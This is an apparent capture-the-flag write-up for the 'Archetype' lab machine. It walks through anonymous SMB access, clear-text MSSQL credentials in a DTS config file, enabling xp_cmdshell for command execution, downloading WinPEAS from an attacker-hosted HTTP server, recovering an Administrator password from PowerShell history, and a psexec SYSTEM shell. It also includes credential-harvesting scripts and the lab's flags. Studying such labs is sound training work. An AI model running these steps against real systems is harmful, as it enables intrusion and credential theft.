Archetype (Tier 2)

Description

  • Tier -> 2

  • Difficulty -> Very Easy

  • OS -> Windows

  • Tags -> Protocols / MSSQL / SMB / Powershell / Reconnaissance / Remote Code Execution / Clear Text Credentials / Information Disclosure / Anonymous-Guest Access

Write-up

  • I started doing an initial port scan using Nmap

nmap 10.129.59.187 -p- -Pn --min-rate 2500 -oN scan.txt

  • With this, I answered the first question

Answer: 1433


  • Then I ran a service and default-script scan (-sVC) against the open ports to identify the services behind them

nmap 10.129.59.187 -p135,139,445,1433,5985,47001,49664,49666,49667,49668,49669 -sVC -oN serv_scan.txt

  • Two services stood out: an SMB server on port 445 and a Microsoft SQL Server on port 1433. I started with SMB, listing the shares with smbclient. When prompted for a password I just pressed Enter (an empty password) and the listing succeeded, which means the server accepts anonymous/guest sessions (smbclient's -N flag skips the prompt entirely)

smbclient -L 10.129.59.187

  • With this, I answered the next question

Answer: backups


  • I then tried to open the shares, starting with the conspicuously named backups share, which had no access restrictions. Inside it I found a single file that looked like a backup of configuration data, so I downloaded it to my machine and closed the connection

smbclient //10.129.59.187/backups   # press Enter at the password prompt (anonymous access)
get prod.dtsConfig                  # DTS (SSIS) package configuration file
exit

  • The file, prod.dtsConfig, is an XML configuration for a SQL Server DTS/SSIS package, and its connection string carried clear-text credentials for a database: a User ID of ARCHETYPE\sql_svc and a password. Since the connection string points at a SQL Server data source, these were very likely valid for the MSSQL instance running on the host
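The extraction step above can be automated. The following is an added example, not code from the original write-up: it parses a .dtsConfig file, pulls out every ConnectionString property and splits the OLE DB style Key=Value connection string into fields, reporting any entry that embeds a password. SAMPLE_DTSCONFIG is constructed for the demo; its element layout follows the DTS configuration file format and the credential values are the ones this write-up reports. The "auth" field flags a DOMAIN\user style User ID as a Windows account, which is the cue to pass -windows-auth to mssqlclient.

```python
"""Pull credentials out of a SQL Server DTS/SSIS package configuration file.

Added example, not code from the original write-up. SAMPLE_DTSCONFIG is
constructed to mirror the layout of a .dtsConfig file; the connection-string
values are the ones the write-up reports for the box.
"""
from __future__ import annotations
import xml.etree.ElementTree as ET

# Constructed sample (element names follow the DTS configuration schema).
SAMPLE_DTSCONFIG = r"""<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(conn: str) -> dict:
    """Split an OLE DB/ODBC style 'Key=Value;Key=Value' string into a dict (keys lower-cased)."""
    out = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep:  # skip empty fragments such as the trailing ';'
            out[key.strip().lower()] = value.strip()
    return out


def find_connection_strings(xml_text: str) -> list[tuple[str, str]]:
    """Return (Path, ConfiguredValue) pairs for every Configuration element that sets a ConnectionString."""
    root = ET.fromstring(xml_text)
    found = []
    for cfg in root.iter("Configuration"):
        path = cfg.get("Path", "")
        value = cfg.findtext("ConfiguredValue", default="")
        if "ConnectionString" in path and value:
            found.append((path, value))
    return found


def extract_credentials(xml_text: str) -> list[dict]:
    """Return one record per connection string that embeds a password (integrated-auth entries are skipped)."""
    creds = []
    for path, conn in find_connection_strings(xml_text):
        kv = parse_connection_string(conn)
        password = kv.get("password") or kv.get("pwd")
        if not password:
            continue  # Integrated Security / no embedded secret: nothing to harvest
        user = kv.get("user id") or kv.get("uid") or ""
        creds.append({
            "path": path,
            "user": user,
            "password": password,
            "server": kv.get("data source") or kv.get("server"),
            "database": kv.get("initial catalog") or kv.get("database"),
            # DOMAIN\user means a Windows account: use mssqlclient's -windows-auth
            "auth": "windows" if "\\" in user else "sql",
        })
    return creds


if __name__ == "__main__":
    for c in extract_credentials(SAMPLE_DTSCONFIG):
        print(f"{c['path']}\n  user={c['user']} password={c['password']} "
              f"server={c['server']} db={c['database']} auth={c['auth']}")
```

Run it against a real file with `extract_credentials(open("prod.dtsConfig").read())`; a connection string using Integrated Security=SSPI yields no record, since there is no secret to reuse.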


  • With this and some research, I answered the next questions

Answer: M3g4c0rp123


Answer: mssqlclient.py


Answer: xp_cmdshell


Answer: WinPEAS


  • To connect to the database I used Impacket's mssqlclient with the credentials from the configuration file. The User ID in the connection string was ARCHETYPE\sql_svc, a Windows account rather than a SQL login, so I passed -windows-auth; the tool prompts for the password and the connection succeeded

impacket-mssqlclient ARCHETYPE/sql_svc@10.129.59.187 -windows-auth

  • Once inside I looked through the databases without finding anything useful, so I checked whether xp_cmdshell could be abused to get command execution through MSSQL. The first attempt failed because the procedure is disabled by default; enabling it with sp_configure requires the sysadmin role (or ALTER SETTINGS) on the instance, which sql_svc has here (IS_SRVROLEMEMBER('sysadmin') returns 1), so after the reconfiguration the same command ran. mssqlclient also ships an enable_xp_cmdshell helper that issues the same statements

-- First attempt: fails, SQL Server reports that xp_cmdshell is turned off by the security configuration
EXEC xp_cmdshell 'whoami';
-- Enable it (needs sysadmin or ALTER SETTINGS); 'show advanced options' must be on first
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Second attempt: runs as the SQL Server service account
EXEC xp_cmdshell 'whoami';

  • Being able to run system commands, I invoked PowerShell through xp_cmdshell to interact with the system more comfortably. A quick test with pwd returned the current working directory as expected

-- single quotes are the T-SQL string delimiter; double quotes only work while QUOTED_IDENTIFIER is off
EXEC xp_cmdshell 'powershell -c pwd';

  • Abusing this, I enumerated the file system. In the sql_svc user's Desktop folder I found user.txt and read it to obtain the user flag

EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Desktop ; dir';
EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Desktop ; Get-Content user.txt';

  • Next I needed a path to escalate privileges, so I ran WinPEAS on the target. I served the binary from my machine over HTTP, downloaded it through xp_cmdshell with PowerShell, ran it, and checked the results, which pointed at some interesting files

# On the attacker machine: fetch WinPEAS and host it over HTTP
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe   # current build: https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
python3 -m http.server 1234   # run from the directory holding winPEASx64.exe

# On the target, through xp_cmdshell (in PowerShell, wget is an alias for Invoke-WebRequest)
EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Desktop ; wget http://10.10.14.117:1234/winPEASx64.exe -outfile winPEASx64.exe';
EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Desktop ; .\winPEASx64.exe';

  • One of the paths WinPEAS flagged was the PowerShell command history file, ConsoleHost_history.txt, which the PSReadLine module keeps under the user's profile (C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\), not under the PowerShell installation directory. Reading it showed a command from an earlier session that authenticated as the Administrator user, with the Administrator password passed on the command line in clear text
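Reviewing a history file by hand works for a few lines; on a busier host it helps to scan for the command shapes that carry secrets inline. The block below is an added example, not code from the original write-up: it classifies each line of a ConsoleHost_history.txt (PSReadLine stores it as one command per line) and pulls out the account and, where present, the secret from net use, ConvertTo-SecureString -AsPlainText, cmdkey /pass: and runas /user: invocations. HISTORY_SAMPLE is constructed for the demo and its passwords are placeholders, not the credentials from the box.

```python
"""Scan a PSReadLine ConsoleHost_history.txt for commands that embed credentials.

Added example, not code from the original write-up. HISTORY_SAMPLE is a
constructed history in PSReadLine's one-command-per-line format; the
passwords in it are placeholders.
"""
from __future__ import annotations
import re

# Constructed sample; placeholder secrets only.
HISTORY_SAMPLE = r"""whoami
Get-ChildItem C:\Users
net.exe use T: \\Archetype\backups /user:administrator Example-Adm1n-Pass
$sec = ConvertTo-SecureString 'Example-Svc-Pass' -AsPlainText -Force
cmdkey /add:fileserver /user:CORP\backup /pass:Example-Bkp-Pass
runas /user:administrator cmd.exe
exit
"""

# (kind, regex) pairs; named groups 'user' and 'secret' are picked up when present.
PATTERNS = [
    # net use <drive> <share> /user:<account> [<password>|*]  (a bare '*' or a /switch is not a password)
    ("net use", re.compile(
        r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)(?:\s+(?P<secret>[^/\s*]\S*))?", re.I)),
    # ConvertTo-SecureString '<password>' -AsPlainText: the plain-text value sits in the quotes
    ("SecureString", re.compile(
        r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.*?)(?P=q).*-AsPlainText", re.I)),
    # cmdkey /add:<target> /user:<account> /pass:<password>
    ("cmdkey", re.compile(
        r"\bcmdkey\b.*?/user:(?P<user>\S+).*?/pass:(?P<secret>\S+)", re.I)),
    # runas prompts for the password, so only the target account leaks
    ("runas", re.compile(r"\brunas\b.*?/user:(?P<user>\S+)", re.I)),
]


def find_leaked_credentials(history: str) -> list[dict]:
    """Return one record per matching history line: line number, kind, user, secret (None if absent), command."""
    hits = []
    for lineno, line in enumerate(history.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            g = m.groupdict()
            hits.append({
                "line": lineno,
                "kind": kind,
                "user": g.get("user"),
                "secret": g.get("secret"),
                "command": line.strip(),
            })
            break  # first matching pattern classifies the line
    return hits


if __name__ == "__main__":
    for h in find_leaked_credentials(HISTORY_SAMPLE):
        print(f"line {h['line']:>3} [{h['kind']}] user={h['user']} secret={h['secret']}")
        print(f"          {h['command']}")
```

Feed it a real file with `find_leaked_credentials(open(path, errors="replace").read())`; the same scan is worth running over every user profile on the host, not only the one you landed in.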


  • With this and the previously found user flag, I answered the next questions

Answer: ConsoleHost_history.txt


Answer: 3e7b102e78218e935bf3f4951fec21a3


  • With the Administrator password I could authenticate to the host over SMB. Impacket helped again, this time with the psexec module: it uploads a service binary to the ADMIN$ share and starts it as a Windows service, so after entering the password at the prompt I got a shell running as NT AUTHORITY\SYSTEM

impacket-psexec administrator@10.129.59.187

  • Finally, I went to the Administrator user's Desktop folder, where I found root.txt, and read it to retrieve the root flag


  • With this, I got the root flag and pwned the machine

Answer: b91ccec3305e98240082d4474b848528
